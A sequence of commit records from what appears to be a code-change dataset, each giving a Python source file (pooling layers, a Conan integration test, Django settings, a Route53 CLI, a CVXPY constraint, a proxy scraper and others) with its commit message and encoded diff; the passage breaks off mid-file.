  Args:
    inputs: input data with dimensions (batch, window dims..., features).
    window_shape: a shape tuple defining the window to reduce over.
    strides: a sequence of `n` integers, representing the inter-window
      strides (default: `(1, ..., 1)`).
    padding: either the string `'SAME'`, the string `'VALID'`, or a sequence
      of `n` `(low, high)` integer pairs that give the padding to apply before
      and after each spatial dimension (default: `'VALID'`).
    count_include_pad: a boolean whether to include padded elements in the
      divisor of the average calculation (default: `True`).
  Returns:
    The average for each window slice.
  """
  y = pool(inputs, 0., lax.add, window_shape, strides, padding)
  if count_include_pad:
    # Fixed divisor: every window nominally holds prod(window_shape) elements.
    y = y / np.prod(window_shape)
  else:
    # Per-position divisor: sum-pool a ones tensor of the same spatial shape
    # to count only the valid (non-padding) elements under each window.
    div_shape = (1,) + inputs.shape[1:-1] + (1,)
    y = y / pool(jnp.ones(div_shape), 0., lax.add, window_shape, strides, padding)
  return y
def max_pool(inputs, window_shape, strides=None, padding="VALID"):
  """Pools the input by taking the maximum of a window slice.

  Args:
    inputs: input data with dimensions (batch, window dims..., features).
    window_shape: a shape tuple defining the window to reduce over.
    strides: a sequence of `n` integers, representing the inter-window
      strides (default: `(1, ..., 1)`).
    padding: either the string `'SAME'`, the string `'VALID'`, or a sequence
      of `n` `(low, high)` integer pairs that give the padding to apply before
      and after each spatial dimension (default: `'VALID'`).
  Returns:
    The maximum for each window slice.
  """
  # Max-reduce each window, starting from -inf as the identity element.
  return pool(inputs, -jnp.inf, lax.max, window_shape, strides, padding)
def min_pool(inputs, window_shape, strides=None, padding="VALID"):
  """Pools the input by taking the minimum of a window slice.

  Args:
    inputs: Input data with dimensions (batch, window dims..., features).
    window_shape: A shape tuple defining the window to reduce over.
    strides: A sequence of `n` integers, representing the inter-window strides
      (default: `(1, ..., 1)`).
    padding: Either the string `'SAME'`, the string `'VALID'`, or a sequence of
      `n` `(low, high)` integer pairs that give the padding to apply before and
      after each spatial dimension (default: `'VALID'`).
  Returns:
    The minimum for each window slice.
  """
  # Min-reduce each window, starting from +inf as the identity element.
  pooled = pool(inputs, jnp.inf, lax.min, window_shape, strides, padding)
  return pooled
|
Python
| 0.000012
|
@@ -3348,18 +3348,109 @@
de_pad:
-..
+a boolean whether to include padded tokens%0A in the average calculation (default: %60True%60)
.%0A Retu
|
e0b90786a815fdc154aecc1057485e712a6286ad
|
use assertRegexpMatches instead of assertRegex to support python 2.7
|
cpt/test/integration/update_some_deps_test.py
|
cpt/test/integration/update_some_deps_test.py
|
import unittest
from conans.client.tools import environment_append
from conans.test.utils.tools import TestClient, TestServer
from cpt.test.unit.utils import MockCIManager
from cpt.test.test_client.tools import get_patched_multipackager
class UpdateTest(unittest.TestCase):
    """Integration test: checks which packages get rebuilt/uploaded when the
    CONAN_UPLOAD_DEPENDENCIES / CONAN_UPDATE_DEPENDENCIES switches are used."""

    # Dependency recipe: bar/0.1.0 (no options).
    conanfile_bar = """from conans import ConanFile
class Pkg(ConanFile):
    name = "bar"
    version = "0.1.0"
    def build(self):
        pass
"""
    # Dependency recipe: foo/1.0.0, shared by default.
    conanfile_foo = """from conans import ConanFile
class Pkg(ConanFile):
    name = "foo"
    version = "1.0.0"
    options = {"shared": [True, False]}
    default_options = "shared=True"
    def build(self):
        pass
"""
    # Alternate revision of foo/1.0.0. NOTE(review): not exported in setUp and
    # not referenced by the test below -- appears unused here.
    conanfile_foo_2 = """from conans import ConanFile
class Pkg(ConanFile):
    name = "foo"
    version = "1.0.0"
    options = {"shared": [True, False]}
    default_options = "shared=False"
    def build(self):
        self.output.info("new foo")
"""
    # Dependency recipe: qux/1.0.0.
    conanfile_foo_3 = """from conans import ConanFile
class Pkg(ConanFile):
    name = "qux"
    version = "1.0.0"
    options = {"shared": [True, False]}
    default_options = "shared=False"
    def build(self):
        self.output.info("qux")
"""
    # Top-level recipe under test; requires the three dependencies above.
    conanfile = """from conans import ConanFile
class Pkg(ConanFile):
    name = "foobar"
    version = "2.0"
    requires = "bar/0.1.0@foo/stable", "foo/1.0.0@bar/testing", "qux/1.0.0@qux/stable"
    def build(self):
        self.output.warn("BUILDING")
"""

    def setUp(self):
        # In-memory server with write permission for the three dependency
        # references, plus a client that exports all recipes locally.
        self._ci_manager = MockCIManager()
        self._server = TestServer(users={"user": "password"},
                                  write_permissions=[("bar/0.1.0@foo/stable", "user"),
                                                     ("foo/1.0.0@bar/testing", "user"),
                                                     ("qux/1.0.0@qux/stable", "user")])
        self._client = TestClient(servers={"default": self._server},
                                  users={"default": [("user", "password")]})
        self._client.save({"conanfile_bar.py": self.conanfile_bar})
        self._client.run("export conanfile_bar.py foo/stable")
        self._client.save({"conanfile_foo.py": self.conanfile_foo})
        self._client.run("export conanfile_foo.py bar/testing")
        self._client.save({"conanfile_foo3.py": self.conanfile_foo_3})
        self._client.run("export conanfile_foo3.py qux/stable")
        self._client.save({"conanfile.py": self.conanfile})

    def test_update_some_dependencies(self):
        # First pass: build everything and upload all dependency packages.
        with environment_append({"CONAN_UPLOAD": self._server.fake_url,
                                 "CONAN_LOGIN_USERNAME": "user",
                                 "CONAN_PASSWORD": "password", "CONAN_USERNAME": "user",
                                 "CONAN_UPLOAD_DEPENDENCIES": "all",
                                 "CONAN_UPDATE_DEPENDENCIES": "True"}):
            mulitpackager = get_patched_multipackager(self._client, username="user",
                                                      channel="testing",
                                                      build_policy=["foobar", "bar", "foo", "qux"],
                                                      exclude_vcvars_precommand=True,
                                                      ci_manager=self._ci_manager)
            mulitpackager.add({}, {})
            mulitpackager.run()
            self.assertIn("Uploading packages for 'foobar/2.0@user/testing'", self._client.out)
            self.assertIn("Uploading packages for 'bar/0.1.0@foo/stable'", self._client.out)
            self.assertIn("Uploading packages for 'foo/1.0.0@bar/testing'", self._client.out)
            self.assertIn("Uploading packages for 'qux/1.0.0@qux/stable'", self._client.out)

            # only build and upload foobar
            mulitpackager = get_patched_multipackager(self._client, username="user",
                                                      channel="testing",
                                                      build_policy="foobar",
                                                      exclude_vcvars_precommand=True,
                                                      ci_manager=self._ci_manager,
                                                      conanfile="conanfile.py")
            mulitpackager.add({}, {})
            mulitpackager.run()
            # Second pass: dependencies must come from the cache; only foobar
            # is rebuilt and uploaded.
            self.assertRegex(str(self._client.out), r'bar/0.1.0@foo/stable:.* - Cache')
            self.assertRegex(str(self._client.out), r'foo/1.0.0@bar/testing:.* - Cache')
            self.assertRegex(str(self._client.out), r'qux/1.0.0@qux/stable:.* - Cache')
            self.assertRegex(str(self._client.out), r'foobar/2.0@user/testing:.* - Build')
            self.assertIn("Uploading packages for 'foobar/2.0@user/testing'", self._client.out)
            self.assertNotIn("Uploading packages for 'bar/0.1.0@foo/stable'", self._client.out)
            self.assertNotIn("Uploading packages for 'foo/1.0.0@bar/testing'", self._client.out)
            self.assertNotIn("Uploading packages for 'qux/1.0.0@qux/stable'", self._client.out)
|
Python
| 0
|
@@ -4337,32 +4337,40 @@
self.assertRegex
+pMatches
(str(self._clien
@@ -4433,32 +4433,40 @@
self.assertRegex
+pMatches
(str(self._clien
@@ -4530,32 +4530,40 @@
self.assertRegex
+pMatches
(str(self._clien
@@ -4635,16 +4635,24 @@
ertRegex
+pMatches
(str(sel
|
80caa173028e0252a6e51e57b6cb9c423df6ad59
|
Access type name via __name__.
|
stellargraph/mapper/graph_generator.py
|
stellargraph/mapper/graph_generator.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2020 Data61, CSIRO
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ..core.graph import StellarGraph
from ..core.utils import is_real_iterable
from .sequences import GraphSequence
from ..core.experimental import experimental
@experimental(reason="Missing unit tests.", issues=[1042])
class GraphGenerator:
    """
    A data generator for use with graph classification algorithms.

    The supplied graphs should be :class:`StellarGraph` objects ready for machine learning. The generator
    requires node features to be available for all nodes in the graph.
    Use the :meth:`flow` method supplying the graph indexes and (optionally) targets
    to get an object that can be used as a Keras data generator.

    This generator supplies the features arrays and the adjacency matrices to a
    mini-batch Keras graph classification model.

    Args:
        graphs (list): a collection of ready for machine-learning StellarGraph-type objects
        name (str): an optional name of the generator
    """

    def __init__(self, graphs, name=None):
        self.node_features_size = None
        for graph in graphs:
            if not isinstance(graph, StellarGraph):
                raise TypeError(
                    f"graphs: expected every element to be a StellarGraph object, found {type(graph).__name__}."
                )
            if len(graph.node_types) > 1:
                raise ValueError(
                    "graphs: node generator requires graphs with single node type, "
                    f"found a graph with {len(graph.node_types)} node types."
                )
            graph.check_graph_for_ml()
            # we require that all graphs have node features of the same dimensionality
            f_dim = graph.node_feature_sizes()[list(graph.node_types)[0]]
            if self.node_features_size is None:
                self.node_features_size = f_dim
            elif self.node_features_size != f_dim:
                raise ValueError(
                    "graphs: expected node features for all graph to have same dimensions,"
                    f"found {self.node_features_size} vs {f_dim}"
                )
        self.graphs = graphs
        self.name = name

    def flow(self, graph_ilocs, targets=None, batch_size=1, name=None):
        """
        Creates a generator/sequence object for training, evaluation, or prediction
        with the supplied graph indexes and targets.

        Args:
            graph_ilocs (iterable): an iterable of graph indexes in self.graphs for the graphs of interest
                (e.g., training, validation, or test set nodes).
            targets (2d array, optional): a 2D array of numeric graph targets with shape `(len(graph_ilocs),
                len(targets))`.
            batch_size (int, optional): The batch size.
            name (str, optional): An optional name for the returned generator object.

        Returns:
            A :class:`GraphSequence` object to use with Keras methods :meth:`fit`, :meth:`evaluate`, and :meth:`predict`
        """
        if targets is not None:
            # Check targets is an iterable
            if not is_real_iterable(targets):
                raise TypeError(
                    f"targets: expected an iterable or None object, found {type(targets).__name__}"
                )
            # Check targets correct shape
            if len(targets) != len(graph_ilocs):
                raise ValueError(
                    f"expected targets to be the same length as node_ids, found {len(targets)} vs {len(graph_ilocs)}"
                )
        if not isinstance(batch_size, int):
            # Fix: report the readable type name (`.__name__`), consistent
            # with the other type errors raised in this class.
            raise TypeError(
                f"expected batch_size to be integer type, found {type(batch_size).__name__}"
            )
        if batch_size <= 0:
            raise ValueError(
                f"expected batch_size to be strictly positive integer, found {batch_size}"
            )
        return GraphSequence(
            graphs=[self.graphs[i] for i in graph_ilocs],
            targets=targets,
            batch_size=batch_size,
            name=name,
        )
|
Python
| 0.000003
|
@@ -4270,16 +4270,25 @@
ch_size)
+.__name__
%7D%22%0A
|
162474c612f8e9d6a4f6d21640cd33b525fe440d
|
add cache busting
|
app/settings.py
|
app/settings.py
|
"""
Django settings for testP project.
Generated by 'django-admin startproject' using Django 1.10.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
import dj_database_url
from .hackathon_variables import *
# Project root (two levels above this settings module).
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# Hard-coded value is a development fallback only; set SECRET in production.
SECRET_KEY = os.environ.get('SECRET', ')6+vf9(1tihg@u8!+(0abk+y*#$3r$(-d=g5qhm@1&lo4pays&')

# SECURITY WARNING: don't run with debug turned on in production!
# Debug stays on unless the PROD_MODE environment variable is set.
DEBUG = not os.environ.get('PROD_MODE', None)

ALLOWED_HOSTS = ['localhost', '127.0.0.1', '0.0.0.0']
# Application definition

INSTALLED_APPS = [
    'jet',
    'jet.dashboard',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.humanize',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'form_utils',
    'bootstrap3',
    'django_tables2',
    'organizers',
    'checkin',
    'user',
    'applications',
    'teams',
    'stats',
]

# Optional app toggled via hackathon_variables (imported with `*` above).
if REIMBURSEMENT_ENABLED:
    INSTALLED_APPS.append('reimbursement')

AUTHENTICATION_BACKENDS = (
    'django.contrib.auth.backends.ModelBackend',
)
# Request/response middleware, in processing order.
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'app.urls'
# Template engine configuration.
# Fix: 'django.template.context_processors.request' was listed twice; the
# duplicate entry has been removed (running it once is sufficient).
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': ['app/templates', ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
                'app.utils.hackathon_vars_processor'
            ],
        },
    },
]

WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases

# Default: local SQLite database for development.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Heroku-style deployment: DATABASE_URL overrides the default.
if os.environ.get('DATABASE_URL', None):
    DATABASES['default'] = dj_database_url.config(conn_max_age=600)

# Explicit PostgreSQL credentials take final precedence when PG_PWD is set.
if os.environ.get('PG_PWD', None):
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.postgresql_psycopg2',
            'NAME': os.environ.get('PG_NAME', 'backend'),
            'USER': os.environ.get('PG_USER', 'backenduser'),
            'PASSWORD': os.environ.get('PG_PWD'),
            'HOST': os.environ.get('PG_HOST', 'localhost'),
            'PORT': '5432',
        }
    }
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Logging config to send logs to email automatically
# ERROR-level django logs are e-mailed to the devs, but only when DEBUG is
# off (the require_debug_false filter).
LOGGING = {
    'version': 1,
    'filters': {
        'require_debug_false': {
            '()': 'django.utils.log.RequireDebugFalse',
        },
    },
    'handlers': {
        'admin_email': {
            'level': 'ERROR',
            'filters': ['require_debug_false'],
            'class': 'app.log.HackathonDevEmailHandler',
        },
    },
    'loggers': {
        'django': {
            'level': 'ERROR',
            'handlers': ['admin_email'],
        },
    },
}
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/

LANGUAGE_CODE = 'en-us'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/

STATIC_URL = '/static/'
STATIC_ROOT = BASE_DIR + '/staticfiles'
STATICFILES_DIRS = [
    os.path.join(BASE_DIR, os.path.join('app', "static")),
]

# File upload configuration
MEDIA_ROOT = 'files'
MEDIA_URL = '/files/'

SENDGRID_API_KEY = os.environ.get('SG_KEY', None)

# Load filebased email backend if no Sendgrid credentials and debug mode
if not SENDGRID_API_KEY and DEBUG:
    EMAIL_BACKEND = 'django.core.mail.backends.filebased.EmailBackend'
    EMAIL_FILE_PATH = 'tmp/email-messages/'
else:
    EMAIL_BACKEND = "sgbackend.SendGridBackend"

# Jet configs
JET_SIDE_MENU_COMPACT = True
JET_INDEX_DASHBOARD = 'app.jet_dashboard.CustomIndexDashboard'

# Set up custom auth
AUTH_USER_MODEL = 'user.User'
LOGIN_URL = 'account_login'
PASSWORD_RESET_TIMEOUT_DAYS = 1

BOOTSTRAP3 = {
    # Don't normally want placeholders.
    'set_placeholder': False,
    'required_css_class': 'required',
}

# Dummy cache in development; file-based cache in production.
if DEBUG:
    CACHES = {
        'default': {
            'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
        }
    }
else:
    CACHES = {
        'default': {
            'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
            'LOCATION': os.path.join(BASE_DIR, 'cache'),
        }
    }

# Add domain to allowed hosts
ALLOWED_HOSTS.append(HACKATHON_DOMAIN)

# Deployment configurations for proxy pass and csrf
CSRF_TRUSTED_ORIGINS = ALLOWED_HOSTS
USE_X_FORWARDED_HOST = True
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')

# Maximum file upload size for forms
# 5 MiB, in bytes.
MAX_UPLOAD_SIZE = 5242880
|
Python
| 0.000001
|
@@ -4698,16 +4698,102 @@
ic%22)),%0A%5D
+%0ASTATICFILES_STORAGE = 'django.contrib.staticfiles.storage.ManifestStaticFilesStorage'
%0A%0A# Fil
|
0cb7f9c41c7ae0a7f487188721f56adf2ff9999d
|
add type hints.
|
lib/acli/services/route53.py
|
lib/acli/services/route53.py
|
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, print_function, unicode_literals)
from boto3.session import Session
from acli.output.route53 import (output_route53_list, output_route53_info)
import botocore.exceptions
def get_boto3_session(aws_config):
    """Build a boto3 Session from an acli Config object.

    @type aws_config: Config
    """
    credentials = {
        'region_name': aws_config.region,
        'aws_access_key_id': aws_config.access_key_id,
        'aws_secret_access_key': aws_config.secret_access_key,
    }
    return Session(**credentials)
def route53_list(aws_config=None):
    """Print all Route53 hosted zones to the console.

    @type aws_config: Config
    """
    conn = get_boto3_session(aws_config).client('route53')
    output_route53_list(output_media='console', zones=conn.list_hosted_zones())
def route53_info(aws_config=None, zone_id=None):
    """Print details of a single hosted zone and its record sets.

    @type aws_config: Config
    @type zone_id: unicode
    """
    session = get_boto3_session(aws_config)
    conn = session.client('route53')
    try:
        hosted_zone = conn.get_hosted_zone(Id=zone_id)
        record_sets = conn.list_resource_record_sets(HostedZoneId=zone_id)
        # Only render output when the response contains a zone id.
        if hosted_zone['HostedZone']['Id']:
            output_route53_info(output_media='console',
                                zone=hosted_zone,
                                record_sets=record_sets)
    except AttributeError:
        # NOTE(review): presumably raised when the response lacks the
        # expected structure -- confirm which call can actually raise this.
        exit("Cannot find hosted zone: {0}".format(zone_id))
    except botocore.exceptions.ClientError:
        # API-level failure (bad zone id, permissions, throttling, ...).
        exit("Cannot request hosted zone: {0}".format(zone_id))
|
Python
| 0
|
@@ -265,16 +265,61 @@
onfig):%0A
+ %22%22%22%0A @type aws_config: Config%0A %22%22%22%0A
retu
@@ -527,24 +527,69 @@
nfig=None):%0A
+ %22%22%22%0A @type aws_config: Config%0A %22%22%22%0A
session
|
b747391c748c94cd8433dfacd935d131b484a29c
|
Improve error handling and refactor base path
|
java/ql/src/utils/model-generator/RegenerateModels.py
|
java/ql/src/utils/model-generator/RegenerateModels.py
|
#!/usr/bin/python3
# Tool to regenerate existing framework CSV models.
from pathlib import Path
import json
import os
import requests
import shutil
import subprocess
import tempfile
import sys
# Maps an LGTM project slug to the generated-model .qll file it refreshes.
# The commented-out entries are temporarily disabled.
lgtmSlugToModelFile = {
    # "apache/commons-beanutils": "java/ql/lib/semmle/code/java/frameworks/apache/BeanUtilsGenerated.qll",
    # "apache/commons-codec": "java/ql/lib/semmle/code/java/frameworks/apache/CodecGenerated.qll",
    # "apache/commons-lang": "java/ql/lib/semmle/code/java/frameworks/apache/Lang3Generated.qll",
    "apache/commons-io": "java/ql/lib/semmle/code/java/frameworks/apache/IOGenerated.qll",
}
def findGitRoot():
    """Return the absolute path of the enclosing git checkout's top level."""
    raw = subprocess.check_output(["git", "rev-parse", "--show-toplevel"])
    return raw.decode("utf-8").strip()
def regenerateModel(lgtmSlug, extractedDb):
    """Regenerate the CSV model for `lgtmSlug` from the extracted database
    at `extractedDb`, overwriting the mapped .qll file in the checkout.

    Exits with a clear error message when the slug has no mapped model file
    (previously an unhelpful KeyError escaped here), and always removes the
    scratch directory, even when model generation fails.
    """
    if lgtmSlug not in lgtmSlugToModelFile:
        # Fail fast with a readable message instead of a KeyError traceback.
        sys.exit("ERROR: slug " + lgtmSlug +
                 " is not mapped to a model file in script " + sys.argv[0])
    tmpDir = tempfile.mkdtemp()
    try:
        print("============================================================")
        print("Generating models for " + lgtmSlug)
        print("============================================================")
        modelFile = lgtmSlugToModelFile[lgtmSlug]
        codeQlRoot = findGitRoot()
        targetModel = codeQlRoot + "/" + modelFile
        subprocess.check_call([codeQlRoot + "/java/ql/src/utils/model-generator/GenerateFlowModel.py", extractedDb,
                               targetModel])
        print("Regenerated " + targetModel)
    finally:
        # Clean up the temp dir even if check_call raised (was leaked before).
        shutil.rmtree(tmpDir)
# Command-line entry point: RegenerateModels.py <lgtm-slug> <extracted-db>.
if len(sys.argv) == 3:
    lgtmSlug = sys.argv[1]
    db = sys.argv[2]
    regenerateModel(lgtmSlug, db)
else:
    # Explain correct usage instead of the former bare print('error'), and
    # exit non-zero so calling scripts/CI notice the failure.
    sys.exit("Usage: " + sys.argv[0] + " <lgtm-slug> <extracted-db-path>")
|
Python
| 0
|
@@ -190,16 +190,77 @@
t sys%0A%0A%0A
+defaultModelPath = %22java/ql/lib/semmle/code/java/frameworks%22%0A
lgtmSlug
@@ -314,48 +314,8 @@
%22: %22
-java/ql/lib/semmle/code/java/frameworks/
apac
@@ -377,48 +377,8 @@
%22: %22
-java/ql/lib/semmle/code/java/frameworks/
apac
@@ -435,48 +435,8 @@
%22: %22
-java/ql/lib/semmle/code/java/frameworks/
apac
@@ -489,48 +489,8 @@
%22: %22
-java/ql/lib/semmle/code/java/frameworks/
apac
@@ -923,19 +923,265 @@
-modelFile =
+# check if lgtmSlug exists as key%0A if lgtmSlug not in lgtmSlugToModelFile:%0A print(%22ERROR: slug %22 + lgtmSlug +%0A %22 is not mapped to a model file in script %22 + sys.argv%5B0%5D)%0A sys.exit(1)%0A modelFile = defaultModelPath + %5C%0A
lgt
|
f3fd4d098ef5465776cd3e71a8e6c889a2b74ff6
|
Update proxy.py
|
lazada_scsdk/proxy.py
|
lazada_scsdk/proxy.py
|
# -*- coding: utf-8 -*-
# @Author: Phu Hoang
# @Date: 2017-05-23 09:40:32
# @Last Modified by: Phu Hoang
# @Last Modified time: 2017-06-16 10:53:12
import logging
from requests.exceptions import ReadTimeout
from http_request_randomizer.requests.proxy.requestProxy import RequestProxy
from http_request_randomizer.requests.parsers.FreeProxyParser import FreeProxyParser
from http_request_randomizer.requests.parsers.ProxyForEuParser import ProxyForEuParser
from http_request_randomizer.requests.parsers.RebroWeeblyParser import RebroWeeblyParser
from http_request_randomizer.requests.parsers.SamairProxyParser import SamairProxyParser
from http_request_randomizer.requests.parsers.HideMyAssProxyParser import HideMyAssProxyParser
from http_request_randomizer.requests.useragent.userAgent import UserAgentManager
# Push back requests library to at least warnings
logging.getLogger("requests").setLevel(logging.WARNING)
# Shared stream handler attached to the root logger by every Proxy instance.
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(name)-6s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
class Proxy(RequestProxy):
    """RequestProxy that seeds its proxy list by scraping several free
    proxy-listing sites, unless a pre-loaded list is supplied."""

    def __init__(self, web_proxy_list=[], sustain=False, timeout=20):
        # NOTE(review): mutable default argument -- calls without
        # web_proxy_list share one list object; confirm this is intended.
        self.userAgent = UserAgentManager()
        self.logger = logging.getLogger()
        self.logger.addHandler(handler)
        self.logger.setLevel(0)

        #####
        # Each of the classes below implements a specific URL Parser
        #####
        parsers = list([])
        # parsers.append(FreeProxyParser('http://free-proxy-list.net', timeout=timeout))
        parsers.append(ProxyForEuParser('http://proxyfor.eu/geo.php', 1.0, timeout=timeout))
        parsers.append(RebroWeeblyParser('http://rebro.weebly.com', timeout=timeout))
        parsers.append(SamairProxyParser('http://samair.ru/proxy/time-01.htm', timeout=timeout))
        parsers.append(HideMyAssProxyParser('http://proxylist.hidemyass.com/', timeout=timeout))

        self.sustain = sustain
        self.parsers = parsers
        self.proxy_list = web_proxy_list
        if len(self.proxy_list) == 0:
            # No pre-loaded proxies: scrape each source over the network.
            self.logger.debug("=== Initialized Proxy Parsers ===")
            for i in range(len(parsers)):
                self.logger.debug("\t {0}".format(parsers[i].__str__()))
            self.logger.debug("=================================")
            for i in range(len(parsers)):
                try:
                    self.proxy_list += parsers[i].parse_proxyList()
                except ReadTimeout:
                    # Best-effort: skip sources that time out.
                    # NOTE(review): logger.warn is deprecated (use warning).
                    self.logger.warn("Proxy Parser: '{}' TimedOut!".format(parsers[i].url))
        else:
            print("Loaded proxies from file")
        self.current_proxy = self.randomize_proxy()
|
Python
| 0.000001
|
@@ -1455,18 +1455,16 @@
%0A
- #
parsers
|
394d5f9cd7c911fa790a63332101b784f67f8b55
|
Add dual variables to constraints
|
cvxpy/constraints/leq_constraint.py
|
cvxpy/constraints/leq_constraint.py
|
"""
Copyright 2013 Steven Diamond
This file is part of CVXPY.
CVXPY is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
CVXPY is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with CVXPY. If not, see <http://www.gnu.org/licenses/>.
"""
import cvxpy.utilities as u
import cvxpy.lin_ops.lin_utils as lu
from cvxpy.constraints.constraint import Constraint
import numpy as np
class LeqConstraint(u.Canonical, Constraint):
    # Operator symbol used when rendering the constraint as text.
    OP_NAME = "<="
    # Numerical slack allowed by `value` when deciding whether the
    # constraint is satisfied.
    TOLERANCE = 1e-4

    def __init__(self, lh_exp, rh_exp):
        """Constraint lh_exp <= rh_exp, stored internally as lh_exp - rh_exp.

        Args:
            lh_exp: The left-hand side expression.
            rh_exp: The right-hand side expression.
        """
        self.args = [lh_exp, rh_exp]
        self._expr = lh_exp - rh_exp
        self._dual_value = None
        super(LeqConstraint, self).__init__()

    @property
    def id(self):
        """Wrapper for compatibility with variables.
        """
        return self.constr_id

    def name(self):
        # "<lhs> <= <rhs>" using the operand expressions' own names.
        return ' '.join([str(self.args[0].name()),
                         self.OP_NAME,
                         str(self.args[1].name())])

    def __str__(self):
        """Returns a string showing the mathematical constraint.
        """
        return self.name()

    def __repr__(self):
        """Returns a string with information about the constraint.
        """
        return "%s(%s, %s)" % (self.__class__.__name__,
                               repr(self.args[0]),
                               repr(self.args[1]))

    def __nonzero__(self):
        """Raises an exception when called.

        Python 2 version.

        Called when evaluating the truth value of the constraint.
        Raising an error here prevents writing chained constraints.
        """
        raise Exception("Cannot evaluate the truth value of a constraint.")

    def __bool__(self):
        """Raises an exception when called.

        Python 3 version.

        Called when evaluating the truth value of the constraint.
        Raising an error here prevents writing chained constraints.
        """
        raise Exception("Cannot evaluate the truth value of a constraint.")

    @property
    def size(self):
        # Size of the internal expression lh_exp - rh_exp.
        return self._expr.size

    # Left hand expression must be convex and right hand must be concave.
    def is_dcp(self):
        return self._expr.is_convex()

    def canonicalize(self):
        """Returns the graph implementation of the object.

        Marks the top level constraint as the dual_holder,
        so the dual value will be saved to the LeqConstraint.

        Returns
        -------
        tuple
            A tuple of (affine expression, [constraints]).
        """
        obj, constraints = self._expr.canonical_form
        dual_holder = lu.create_leq(obj, constr_id=self.id)
        return (None, constraints + [dual_holder])

    def variables(self):
        """Returns the variables in the compared expressions.
        """
        return self._expr.variables()

    def parameters(self):
        """Returns the parameters in the compared expressions.
        """
        return self._expr.parameters()

    @property
    def value(self):
        """Does the constraint hold?

        Returns
        -------
        bool
        """
        if self._expr.value is None:
            return None
        else:
            # Satisfied when every entry of lh - rh is within TOLERANCE.
            return np.all(self._expr.value <= self.TOLERANCE)

    @property
    def violation(self):
        """How much is this constraint off by?

        Returns
        -------
        NumPy matrix
        """
        if self._expr.value is None:
            return None
        else:
            # Element-wise positive part of lh - rh.
            return np.maximum(self._expr.value, 0)

    # The value of the dual variable.
    @property
    def dual_value(self):
        return self._dual_value

    def save_value(self, value):
        """Save the value of the dual variable for the constraint's parent.

        Args:
            value: The value of the dual variable.
        """
        self._dual_value = value
|
Python
| 0
|
@@ -718,16 +718,126 @@
s as lu%0A
+# Only need Variable from expressions, but that would create a circular import.%0Afrom cvxpy import expressions%0A
from cvx
@@ -1117,26 +1117,72 @@
elf.
-_
dual_va
-lue = None
+riable = expressions.variables.Variable(*self._expr.size)
%0A
@@ -4160,30 +4160,38 @@
return self.
-_
dual_
+variable.
value%0A%0A d
@@ -4389,24 +4389,36 @@
elf.
-_
dual_va
-lue =
+riable.save_value(
value
+)
%0A
|
1e1e2793bad3db9201e51c5038edde5373424ad6
|
Put infrastructure in place for javascript targetting
|
client/compile.py
|
client/compile.py
|
#!/usr/bin/env python
import os.path
from HTMLParser import HTMLParser
import re
"""
Certain runtimes (like AIR) don't support dynamic function creation. Parse the
JavaScript and create the template beforehand.
"""
class Compiler(HTMLParser):
    """Extracts the contents of <script type="text/html" name="..."> blocks
    from an HTML document into the `scripts` dict (name -> template text).

    Fix: parser state used to live in mutable CLASS attributes, so every
    Compiler instance shared one `scripts` dict (and leftover `script`
    text); the state is now per-instance and the base class is initialised.
    """

    def __init__(self):
        HTMLParser.__init__(self)
        self.script = ''        # template text accumulated so far
        self.scripts = {}       # finished templates, keyed by name
        self.inScript = False   # inside a template <script> block?
        self.scriptName = ''    # name attribute of the current block

    def handle_startendtag(self, tag, attrs):
        # Re-serialise self-closing tags that appear inside a template.
